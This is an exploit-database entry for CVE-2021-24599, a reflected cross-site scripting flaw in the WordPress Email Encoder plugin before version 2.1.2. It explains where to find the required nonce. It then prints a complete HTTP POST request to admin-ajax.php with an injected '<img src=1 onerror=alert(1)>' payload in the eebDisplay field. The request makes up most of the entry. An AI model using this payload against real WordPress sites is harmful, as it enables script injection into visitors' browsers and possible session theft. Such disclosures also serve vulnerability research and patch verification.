Exploit for Email Encoder < 2.1.2 - Reflected Cross Site Scripting CVE-2021-24599

Name: Exploit for Email Encoder < 2.1.2 - Reflected Cross Site Scripting CVE-2021-24599
Rating: 5 (265 reviews)

2021-08-02 | CVSS 4.3

## https://sploitus.com/exploit?id=WPEX-ID:625A272F-5C69-4F6A-8EEE-32F70CD4A558
The vulnerable function is nonce protected, the nonce can be found in the site's HTML source by searching for the javascript variable "eeb_ef" 

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 129
Origin: http://127.0.0.1:8080
DNT: 1
Connection: keep-alive
Referer: http://127.0.0.1:8080/
Cookie: wordpress_test_cookie=WP%20Cookie%20check
Upgrade-Insecure-Requests: 1

action=eeb_get_email_form_output&eebsec=<your nonce here>&eebMethod=escape&eebDisplay=&lt;img src=1 onerror=alert(1)&gt;